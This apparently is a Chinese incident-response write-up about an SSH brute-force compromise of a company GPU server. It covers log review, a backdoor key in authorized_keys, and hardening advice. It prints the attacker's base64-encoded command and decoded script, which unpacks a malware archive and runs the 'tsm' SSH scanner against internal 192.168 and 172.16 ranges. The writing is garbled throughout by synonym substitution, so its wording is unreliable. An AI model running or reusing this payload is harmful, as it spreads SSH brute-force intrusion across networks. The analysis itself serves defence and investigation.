###邮件音讯收到告警,公司机房的一台用于大数据剖析的Dell T630办事器发明SSH的屡次短时并发登录哀求告警,在流分体系盘问登录的IP地点多为外洋IP,同时触发了1个严峻级另外宁静事情告警,该打击地点为法国IP,且与ssh登录记载坚持分歧。
在要挟谍报中心盘问这个IP,表现有DDOS打击和SSH打击
办事器为公司外部的一台GPU办事器,办事器操纵体系 Ubuntu 18.04.3 LTS,平常只做测试用,对外开启了SSH端口,做了一些根本的宁静设置,好比克制root用户近程登录,平凡用户登岸关照等。但由于办事器属于多人利用,创立的非root用户,大概存在用户弱暗码。
公司根本网络拓扑状况
1.在下面运转挖矿步伐,斲丧CPU、GPU、内存和网络带宽
2.被看成肉鸡去打击外网的办事器
3.被看成肉鸡入侵内网的其他办事器和主机,形成一系列的横向要挟
4.体系蒙受毁坏,办事器数据丧失
收到告警关照后,立刻登录到办事器检察状况,发明办事器CPU内存网络带宽临时都是正常的,没有呈现高使用率,但发明办事器汗青登录记载,汗青下令和/var/log/messages都被清空了,显然黑客具有肯定的反侦查认识。
利用lastb下令检察登岸失败的操纵,发明有许多外洋IP在实验登录这台呆板的ssh,应该是在暴力破解办事器暗码。
由于告警关照下面登任命户是zb, 因而zb用户的暗码应该是被破解,并且黑客乐成利用zb用户登岸进入了ag的办事器。ag检察zb用户运转的历程,发明了非常历程,这里黑客是经过base64编码通报shell下令(应该是为了躲避规矩引擎的检测)
bash -c sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApybSAtcmYgLlgxOS11bml4CnJtIC1yZiAuWDIqCm1rZGlyIC5YMjUtdW5peApjZCAuWDI1LXVuaXgKbXYgL3Zhci90bXAvZG90YTMudGFyLmd6IGRvdGEzLnRhci5negp0YXIgeGYgZG90YTMudGFyLmd6CnNsZWVwIDNzICYmIGNkIC90bXAvLlgyNS11bml4Ly5yc3luYy9jCm5vaHVwIC90bXAvLlgyNS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxOTIuMTY4ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDhtICYmIG5vaHVwIC90bXAvLlgyNS11bml4Ly5yc3luYy9jL3RzbSAtdCAxNTAgLVMgNiAtcyA2IC1wIDIyIC1QIDAgLWYgMCAtayAxIC1sIDEgLWkgMCAvdG1wL3VwLnR4dCAxNzIuMTYgPj4gL2Rldi9udWxsIDI+MSYKc2xlZXAgMjBtICYmIGNkIC4uOyAvdG1wLy5YMjUtdW5peC8ucnN5bmMvaW5pdGFsbCAyPjEmCmV4aXQgMA==" | base64 --decode | bash
经过base64解码失掉呆板运转的是一些shell下令
#!/bin/bash
cd /tmp
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
rm -rf .X19-unix
rm -rf .X2*
mkdir .X25-unix
cd .X25-unix
mv /var/tmp/dota3.tar.gz dota3.tar.gz
tar xf dota3.tar.gz
sleep 3s && cd /tmp/.X25-unix/.rsync/c
nohup /tmp/.X25-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X25-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1&
exit 0
可以看到,黑客在呆板上解压了一个包,运转了一些步伐,在/tmp上面也能找到留下的步伐,但有大概是由于下载不完全,紧缩包破坏了,只解压出来一局部的步伐,install的下令运转失败了招致终极木马步伐是没有实行起来的。这个时分曾经发明了办事器被入侵,ag实时举行了处置,黑客步伐还没有起来的状况下,这台主机的外网毗连被ag堵截了,停失了一切非常的历程。 
同时,ag经过人工排查发明,在办事器的zb用户的家目次 /home/zb/.ssh/authorized_keys这个文件内里被添加了公钥,留了后门,这种状况下,当前黑客就可以完成免暗码登录ag的办事器。这个文件的修正工夫恰好是入侵的工夫。
由于这台呆板只要一个SSH的端口映射在公网上,以是黑客应该是从SSH登录进体系然后下载并运转了步伐,猜疑是由于zb这个用户的暗码比力弱,被黑客字典破解了。
至于木马文件是怎样下载到呆板下面来的,开端判别应该是经过scp,由于scp是加密的,假如用wget curl之类的有大概会被防病毒设置装备摆设检测到,经过前面的会话记载检察192.168.4.144这台呆板和内部的毗连也只要ssh协议。
把办事器上黑客留下的步伐用杀毒软件扫描,杀毒软件报木马步伐。
检察这台呆板的外联IP状况,发明有许多外洋的IP在毗连这台呆板的SSH端口
这一条便是事先黑客登录体系的SSH毗连,由于payload巨细有3M多,可揣测在传输背景木马的文件到入侵了的办事器。 
经过流量剖析体系的流记载可以看出这一段工夫内与192.168.4.144通讯的都是内部的IP,并且都是ssh的使用,没有其他的使用,阐明黑客是间接经过SSH入侵的这一台办事器,不是外部其他办事器入侵,也不是经过其他的使用。
扫描发明该办事器对局域网开放了三个端口,两个SSH的端口,一个SMTP的端口,但对外网只开放了一个SSH的端口。
发明了一个25端口的中危毛病,并未发明SSH办事的毛病,黑客应该不是使用这个毛病入侵的。那就只能是经过SSH暴力破解进入的办事器。
办事器克制用户设置弱暗码,设置庞大用户暗码战略,实时清算不利用的用户,和用户组(可以指定暗码战略)。
克制root用户登录,平凡用户若有必要利用sudo实行。
经过第三方防护使用来避免ssh暴力破解(denyhosts,fail2ban可以完成一连输错暗码频频就把IP列到黑名单,一段工夫后主动移出黑名单)。
利用密钥登录,修正办事的默许端口,利用不常用端口。
活期加固体系,及时更新体系版本和运转的软件版本。
